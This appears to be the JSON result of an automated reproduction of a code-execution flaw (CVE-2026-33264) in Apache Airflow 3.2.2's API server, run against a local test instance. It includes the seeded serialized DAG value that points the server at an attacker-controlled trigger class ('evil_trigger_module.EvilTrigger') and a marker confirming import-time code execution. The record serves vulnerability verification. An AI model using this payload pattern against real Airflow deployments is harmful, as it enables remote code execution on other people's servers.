{
  "airflow_version_expected": "3.2.2",
  "attempt": 1,
  "dag_id": "cve_2026_33264_probe_3_2_2_1",
  "port": 18101,
  "airflow_home": "/data/pruva/runs/e6d20256-b0e8-49c3-a908-a69cffcc1535/bundle/artifacts/airflow_api_3.2.2_1/airflow_home",
  "module_dir": "/data/pruva/runs/e6d20256-b0e8-49c3-a908-a69cffcc1535/bundle/artifacts/airflow_api_3.2.2_1/airflow_home/dags",
  "marker": "/data/pruva/runs/e6d20256-b0e8-49c3-a908-a69cffcc1535/bundle/artifacts/airflow_api_3.2.2_1/api_server_rce_marker.txt",
  "server_log": "/data/pruva/runs/e6d20256-b0e8-49c3-a908-a69cffcc1535/bundle/artifacts/airflow_api_3.2.2_1/airflow_api_server.log",
  "endpoint_url": "http://127.0.0.1:18101/ui/grid/structure/cve_2026_33264_probe_3_2_2_1?offset=0&limit=100",
  "service_started": true,
  "healthcheck_passed": true,
  "target_reached": true,
  "http_status": "200",
  "import_side_effect_observed": true,
  "exception_type": null,
  "exception_message": null,
  "seed_stdout": "2026-07-07T22:36:49.227067Z [info     ] setup plugin alembic.autogenerate.schemas [alembic.runtime.plugins] loc=plugins.py:37\n2026-07-07T22:36:49.227215Z [info     ] setup plugin alembic.autogenerate.tables [alembic.runtime.plugins] loc=plugins.py:37\n2026-07-07T22:36:49.227276Z [info     ] setup plugin alembic.autogenerate.types [alembic.runtime.plugins] loc=plugins.py:37\n2026-07-07T22:36:49.227347Z [info     ] setup plugin alembic.autogenerate.constraints [alembic.runtime.plugins] loc=plugins.py:37\n2026-07-07T22:36:49.227417Z [info     ] setup plugin alembic.autogenerate.defaults [alembic.runtime.plugins] loc=plugins.py:37\n2026-07-07T22:36:49.227486Z [info     ] setup plugin alembic.autogenerate.comments [alembic.runtime.plugins] loc=plugins.py:37\n{\n  \"seeded_dag_id\": \"cve_2026_33264_probe_3_2_2_1\",\n  \"dag_version_id\": \"019f3eba-116e-7be1-abe3-fc2bcf8442d7\",\n  \"serialized_default_args\": \"{'__type': 'base_trigger', '__var': ['evil_trigger_module.EvilTrigger', {'__type': 'dict', '__var': {'attacker': 'serialized_dag_author_controlled_class_path'}}]}\"\n}\n",
  "api_server_pid": 17188,
  "health_http_status": "200",
  "curl_stderr": "",
  "http_response_excerpt": "[{\"id\":\"t1\",\"label\":\"t1\"}]",
  "http_headers_excerpt": "HTTP/1.1 200 OK\ndate: Tue, 07 Jul 2026 22:36:52 GMT\nserver: uvicorn\ncontent-length: 26\ncontent-type: application/json\nvary: Accept-Encoding\n\n",
  "api_server_returncode": 0,
  "marker_content": "import-time code execution in Airflow API server; pid=17188\n",
  "server_log_tail": "ing  ] FileType is deprecated. Simply open files after parsing arguments. [py.warnings] category=PendingDeprecationWarning filename=/data/pruva/project-cache/03610ec6-e6fb-4086-9681-103dd9199da6/repo/airflow_product_venv/lib/python3.14/site-packages/airflow/cli/cli_config.py lineno=605\n2026-07-07T22:36:50.569077Z [warning  ] FileType is deprecated. Simply open files after parsing arguments. [py.warnings] category=PendingDeprecationWarning filename=/data/pruva/project-cache/03610ec6-e6fb-4086-9681-103dd9199da6/repo/airflow_product_venv/lib/python3.14/site-packages/airflow/cli/cli_config.py lineno=816\n2026-07-07T22:36:50.611294Z [info     ] setup plugin alembic.autogenerate.schemas [alembic.runtime.plugins] loc=plugins.py:37\n2026-07-07T22:36:50.611524Z [info     ] setup plugin alembic.autogenerate.tables [alembic.runtime.plugins] loc=plugins.py:37\n2026-07-07T22:36:50.611583Z [info     ] setup plugin alembic.autogenerate.types [alembic.runtime.plugins] loc=plugins.py:37\n2026-07-07T22:36:50.611616Z [info     ] setup plugin alembic.autogenerate.constraints [alembic.runtime.plugins] loc=plugins.py:37\n2026-07-07T22:36:50.611648Z [info     ] setup plugin alembic.autogenerate.defaults [alembic.runtime.plugins] loc=plugins.py:37\n2026-07-07T22:36:50.611674Z [info     ] setup plugin alembic.autogenerate.comments [alembic.runtime.plugins] loc=plugins.py:37\n  ____________       _____________\n ____    |__( )_________  __/__  /________      __\n____  /| |_  /__  ___/_  /_ __  /_  __ \\_ | /| / /\n___  ___ |  / _  /   _  __/ _  / / /_/ /_ |/ |/ /\n _/_/  |_/_/  /_/    /_/    /_/  \\____/____/|__/\nRunning the API server with uvicorn:\nApps: all\nWorkers: 1\nHost: 127.0.0.1:18101\nTimeout: 120\nLogfiles: -\n=================================================================\n2026-07-07T22:36:52.302379Z [info     ] Started server process [17188] [uvicorn.error] loc=server.py:91\n2026-07-07T22:36:52.302504Z [info     ] Waiting for application startup. [uvicorn.error] loc=on.py:48\n2026-07-07T22:36:52.303106Z [info     ] Application startup complete.  [uvicorn.error] loc=on.py:62\n2026-07-07T22:36:52.304076Z [info     ] Uvicorn running on http://127.0.0.1:18101 (Press CTRL+C to quit) [uvicorn.error] loc=server.py:222\n2026-07-07T22:36:52.926247Z [warning  ] The HMAC key is 24 bytes long, which is below the minimum recommended length of 64 bytes for SHA512. See RFC 7518 Section 3.2. [py.warnings] category=InsecureKeyLengthWarning filename=/data/pruva/project-cache/03610ec6-e6fb-4086-9681-103dd9199da6/repo/airflow_product_venv/lib/python3.14/site-packages/jwt/api_jwt.py lineno=147\n2026-07-07T22:36:53.211525Z [warning  ] The HMAC key is 24 bytes long, which is below the minimum recommended length of 64 bytes for SHA512. See RFC 7518 Section 3.2. [py.warnings] category=InsecureKeyLengthWarning filename=/data/pruva/project-cache/03610ec6-e6fb-4086-9681-103dd9199da6/repo/airflow_product_venv/lib/python3.14/site-packages/jwt/api_jwt.py lineno=147\n2026-07-07T22:36:53.212729Z [warning  ] The HMAC key is 24 bytes long, which is below the minimum recommended length of 64 bytes for SHA512. See RFC 7518 Section 3.2. [py.warnings] category=InsecureKeyLengthWarning filename=/data/pruva/project-cache/03610ec6-e6fb-4086-9681-103dd9199da6/repo/airflow_product_venv/lib/python3.14/site-packages/jwt/api_jwt.py lineno=368\n2026-07-07T22:36:53.221551Z [info     ] request finished               [http.access] client_addr=127.0.0.1:50420 duration_us=10313 loc=http_access_log.py:98 method=GET path=/ui/grid/structure/cve_2026_33264_probe_3_2_2_1 query='offset=0&limit=100' status_code=200\n2026-07-07T22:36:53.300224Z [info     ] Shutting down                  [uvicorn.error] loc=server.py:270\n2026-07-07T22:36:53.401796Z [info     ] Waiting for application shutdown. [uvicorn.error] loc=on.py:67\n2026-07-07T22:36:53.402157Z [info     ] Application shutdown complete. [uvicorn.error] loc=on.py:76\n2026-07-07T22:36:53.402227Z [info     ] Finished server process [17188] [uvicorn.error] loc=server.py:101\n"
}